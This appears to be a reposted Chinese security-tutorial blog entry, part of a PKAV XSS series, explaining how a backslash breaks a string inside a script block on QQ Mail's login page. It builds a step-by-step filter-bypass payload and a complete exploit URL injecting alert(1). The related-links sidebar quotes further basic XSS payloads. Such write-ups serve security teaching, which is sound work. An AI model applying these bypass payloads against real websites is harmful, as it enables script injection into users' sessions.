5.反斜线复仇记

最新推荐文章于 2023-06-09 13:28:07 发布
最新推荐文章于 2023-06-09 13:28:07 发布
阅读量352 收藏
点赞数
分类专栏: 那些年我们一起学XSS(腾讯实例)
原文链接:http://www.pkav.net
版权

作者:心伤的瘦子

来自:PKAV技术宅社区

网址:http://www.pkav.net

-----------------------------------------------------------------------------------------------------------------

简要描述:

还是在<script>之间的场景,某些情况下,我们仅仅需要的只是一个反斜线,就可以绕过过滤了。

详细说明:

1.有以下实例点

http://mail.qq.com/cgi-bin/login?vt=passport&ss=aaa&from=bbb&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1

2.对应的输出,如下图所示:

3.经过测试,我们可以看到,双引号是用不了,但是反斜线还可以使用

4.那么这里是否可以成功的XSS呢?我们把缺陷代码部分提取出来

<script>getTop().location.href="/cgi-bin/loginpage?autologin=n&errtype=1&verify=&clientuin="+"&t="+"&alias="+"&regali
as="+"&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%252Fcgi-bin%252Fsetting10%253Faction%253Dlist%2526t%253Dsetting1
0%2526ss%253Dindex%2526Mtype%253D1%2526clickpos%253D20%2526loc%253Ddelegate%252Cwebmap%252C%252C1"+"&title="+"&url=%2
Fcgi-bin%2Flogin%3Fvt%3Dpassport%26ss%3Daaa%2522%26from%3Dbbb%5C%26delegate_url%3D%252Fcgi-bin%252Fframe_html%253Furl
%253D%2525252Fcgi-bin%2525252Fsetting10%2525253Faction%2525253Dlist%25252526t%2525253Dsetting10%25252526ss%2525253Din
dex%25252526Mtype%2525253D1%25252526clickpos%2525253D20%25252526loc%2525253Ddelegate%2525252Cwebmap%2525252C%2525252C
1"+"&org_fun="+"&aliastype="+"&ss=aaa"+"&from=bbb"+"&param="+"&sp=6fa57ce5b3047ebMTM1NTQwOTA2Mg"+"&r=3ec785174fff5206
ed6f0cf4a8c5e3c5"+"&ppp="+"&secpp="</script>

5.可以看到有缺陷的部分是

location.href="........."+"&ss=aaaa"+"&from=bbb"+"&param=";//后面省略

我们可以控制的是aaaa,又不能用",怎么办呢?

因为我们可以使用\,那么我们可以杀掉aaaa后面的双引号

location.href="........."+"&ss=aaaa\"+"&from=bbb"+"&param=";

可以看到代码的结果因为一个反斜线发生了变化,如下图:

6.为了保证bbb后面的语法正确性,我们把bbb改为一个数字,把bbb后面加上//来注释掉后面的部分。变成以下形式

location.href="........."+"&ss=aaaa\"+"&from=1//"+"&param=";

7.看起来不错哦,但是会出来一些问题,"字符串"&from=1,这样是错误的,因为&符号的优先级高,("字符串"&from)=1是无法进行这种赋值操作的。这样一来还是不行。别着急。我们可以稍微改动一下。变为以下形式

location.href="........."+"&ss=aaaa\"+"&from==1//"+"&param=";

由于==的优先级比&高,所以语句相当于("字符串")&(from==1)

8.更顺眼了,但是还是会悲剧啊。由于from未定义,直接和1进行相等判断的话,会报错,错误是:“from”未定义。。。怎么办呢?

9.别紧张,javascript里有一个特性。如下:

aaa();

function aaa(){

}

凡是以function xxx(){}形式定义的函数,都会被最优先解析。换句话说:

解析器在解析JS代码段时,会先将function xxx(){}拿到最前面解析,然后再依次解析其它的部分。换句话说,上面的代码,实际的解析顺序是:

function aaa(){

}

aaa();

利用这样一个特性,我们的代码可以改改:

location.href="........."+"&ss=aaaa\"+"&from==1;function from(){}//"+"&param=";

这样一来,我们的functionfrom(){}就会被提前解析,从而定义了from,后面from==1的时候,就不会报错啦~~

10.故事往往是曲折的,到了这一步,我们会发现还是不行

看一看源代码吧~~,哎,我们的空格被转义为了 

11.当然,这么一点小事情,难不到我们的,我们用注释符来做分隔符。/**/替换空格,有没有觉得和sql注入一样了,咔咔

于是,我们的代码变为了:

location.href="........."+"&ss=aaaa\"+"&from==1;function/**/from(){}//"+"&param=";

12.嗯,这次没有语法错误了,我们插入我们自己的JS代码。

location.href="........."+"&ss=aaaa\"+"&from==1;alert(1);function/**/from(){}//"+"&param=";

最终的利用代码如下:

http://mail.qq.com/cgi-bin/login?vt=passport&ss=\&from==0;alert(1);function/**/from(){};//&delegate_url=%2Fcgi-bin%2F
frame_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dinde
x%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1

恩,这次是我们的反斜线为双引号报仇啦!

13.修复方案:

(1)随便修修就好

(2)某些情况下,\ 还是很危险的

 

 

红烧兔纸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
swift 替换斜杠
眼泪笑了
10-16 5267
let a = "\\你好\\你好\\你好\\你好" let abc = a.stringByReplacingOccurrencesOfString("\\", withString: "") println(abc) OK
Xss总结
code_lab
06-13 757
1. 什么都没过滤的入门情况< script>alert(1)< /script>(练习时去掉空格) < img src=”XXXX”> < img src=1 onerror=alert(1);> 2. 输出在< script>< /script>之间的情况1.< /script>< script>XXX 2.针对输出在不同的场景,进行合适的过滤。 3. 输出在HTML属性里的情况有时候,输
【IOS开发】SwiftUI中的斜杠\含义以及用法
最新发布
番茄Salad
06-09 1132
在 SwiftUI 中,使用 \(斜杠)可以访问环境中的键路径(key path),这样你就可以获取环境变量的值。键路径是一种表示环境中特定值的路径。例如,\colorScheme 表示获取环境中的 colorScheme 值,\locale 表示获取环境中的 locale 值。使用 \ 的语法是为了告诉 SwiftUI,我们要获取环境中特定键路径的值,而不是创建一个新的属性或变量。使用字符串插值时,你可以在字符串中使用 () 语法将变量或表达式的值插入到其中,以便创建动态的文本内容。
1.什么都没过滤的入门情况
→_→
05-04 518
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ------------------------------------------------------------------------------------------------------------------------------ 1.XSS的存在,一定是伴随着输入,与输出2个概...
12.Dom Xss进阶 [路径con] ---没看懂,需要利用XSS扫描器,不会
→_→
05-17 610
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ----------------------------------------------------------------------------- 简要描述: 我不是萝莉con,我是路径con。 一些程序员会动态的加载json数据,同域的时候,可以使用ajax;而有时候,数据所在域和当前页面所在域又不一致。所以需要跨域请求。跨域请求数据的手段中,有一种叫做jsonp。 用代码表示的话,就是 s
ThinkPHP入库出现两次斜线转义及数据库类转义的解决方法
12-19
一个更稳健的解决方案是,首先使用`stripslashes`函数去除可能存在的多余斜线,然后再进行正常的转义操作。这是修改后的`escape_string`方法: ```php public function escape_string($str) { $str = ...
52第二十七回 斜线上转义来,今日方知我是我 (1).mp4
09-17
Python原来这么简单(win系统 提高篇)
首页导航栏+斜线
01-12
首页导航栏+斜线 以下是需要填写五十个字符: Poll SCM :这是CI 系统中常见的选项。当您选择此选项,您可以指定一个定时作业表达式来定义Jenkins每隔多久检查一下您源代码仓库的变化。如果发现变化,就执行一次...
4.宽字节复仇记[QQ邮箱基本通用]
→_→
05-08 1072
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ---------------------------------------------------------------------------------- 简要描述: 前面教程第2节,说到了输出在<script>..</script>之间的情况。也说到了后面会再继续...
19.存储型XSS入门 [什么都没过滤的情况]
→_→
05-23 379
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ------------------------------------------------------------------------------------------------------------------------------- 简要描述: 存储型和射型相比,只是多了输入存储、输出取出的过程。简单点说: 射型是:输入--输出; 存储型是:输入--进入数据库*--取出数据库--输出
pkav简单爆破
qq_44704184的博客
06-19 1582
pkav简单实战
Swift学习之转义字符
学无止境
01-13 5209
1、\0   空字符 2、\\    斜线 3、\t    水平制表符 4、\n    换行符 5、\r    回车符 6、\"    双引号 7、\'     单引号 8、单字节 Unicode 标量,写成\xnn,其中nn为两位十六进制数 9、双字节 Unicode 标量,写成\xnnnn,其中nnnn为四位十六进制数 10、四字节 Unicode 标量,写成\xnnnnn
Swift - 字符串字面量\(String)的转义字符
iteye_3937的博客
08-29 1230
字符串字面量可以包含以下特殊字符: 1.转义特殊字符 \0 (空字符)、\\(斜线)、\t (水平制表符)、\n (换行符)、\r (回车符)、\" (双引号)、\' (单引号)。 2.单字节 Unicode 标量,写成 \xnn,其中 nn 为两位十六进制数。 3.双字节 Unicode 标量,写成 \unnnn,其中 nnnn 为四位十六进制数。 4.四字节 Unicode 标量,写...
PKav HTTP Fuzzer 爆破带有简单验证码的系统
Geekwei的博客
04-25 2万+
登录窗口设置了验证码,一般的暴力破解工具还不能绕过验证码,这下就不得不介绍一款国产神器Pkav HTTP Fuzzer ,哈哈,没错,前面我那是记的流水账,这才是我真正想同大家分享的。PKav HTTP Fuzzer 能爆破带有简单验证码的后台,下面我就给大家演示下如何使用PKav HTTP Fuzzer。
安全、漏洞信息发布平台
weixin_34232617的博客
09-12 231
1.WooYun:乌云安全漏洞报告平台 www.WooYun.org2.CNNVD:中国国家漏洞库 www.cnnvd.org.cn3.SCAP中文社区:(安全内容自动化协议)http://www.scap.org.cn4.Sebug漏洞库(Sebug漏洞库: 漏洞目录、安全文档、漏洞趋势)http://sebug.net5.文件处理信息泄露漏洞 http://url.c...
个人总结-网络安全学习和CTF必不可少的一些网站
宛十八的专栏
04-07 7795
学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P 就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍) http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0 安
米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
热门推荐
龙哥盟
02-23 4万+
米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。通过爆破工具就可以很容易破解用户的弱口令。
org.apache.poi 斜线表头
05-27
可以使用 Apache POI 中的 XSSF(Excel文件格式)来创建斜线表头。具体步骤如下: 1. 创建一个工作簿对象 XSSFWorkbook。 2. 创建一个工作表对象 XSSFSheet。 3. 创建一个字体对象 XSSFFont,并设置它的属性,如字体、字号和颜色等。 4. 创建一个样式对象 XSSFCellStyle,并设置它的属性,如边框、对齐方式和背景颜色等。 5. 创建一个单元格对象 XSSFCell,并设置它的值和样式。 6. 将单元格添加到行对象 XSSFRow 中。 7. 将行对象添加到工作表对象 XSSFSheet 中。 8. 最后,使用工作簿对象 XSSFWorkbook 将工作表写入到 Excel 文件中。 以下是一个示例代码,可以创建一个带有斜线表头的 Excel 文件: ```java import java.io.FileOutputStream; import org.apache.poi.ss.usermodel.*; import org.apache.poi.xssf.usermodel.*; public class SlantHeaderExample { public static void main(String[] args) throws Exception { // 创建工作簿 XSSFWorkbook workbook = new XSSFWorkbook(); // 创建工作表 XSSFSheet sheet = workbook.createSheet("Example"); // 创建字体 XSSFFont font = workbook.createFont(); font.setBold(true); font.setFontHeightInPoints((short) 14); // 创建样式 XSSFCellStyle style = workbook.createCellStyle(); style.setAlignment(HorizontalAlignment.CENTER); style.setVerticalAlignment(VerticalAlignment.CENTER); style.setFillForegroundColor(IndexedColors.GREY_25_PERCENT.getIndex()); style.setFillPattern(FillPatternType.SOLID_FOREGROUND); style.setFont(font); // 创建表头行 int rowIndex = 0; XSSFRow headerRow = sheet.createRow(rowIndex++); // 创建斜线表头单元格 XSSFCell cornerCell = headerRow.createCell(0); cornerCell.setCellValue("Header"); cornerCell.setCellStyle(style); for (int i = 1; i <= 5; i++) { // 创建表头单元格 XSSFCell headerCell = headerRow.createCell(i); headerCell.setCellValue("Column " + i); headerCell.setCellStyle(style); // 创建斜线表头单元格 XSSFCell slantHeaderCell = sheet.createRow(rowIndex++).createCell(0); slantHeaderCell.setCellValue("Row " + i); slantHeaderCell.setCellStyle(style); } // 自适应列宽 for (int i = 0; i <= 5; i++) { sheet.autoSizeColumn(i); } // 写入到文件 FileOutputStream out = new FileOutputStream("SlantHeaderExample.xlsx"); workbook.write(out); out.close(); System.out.println("Excel 文件已生成!"); } } ``` 上述代码会生成一个名为 SlantHeaderExample.xlsx 的 Excel 文件,其中包含一个带有斜线表头的工作表。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值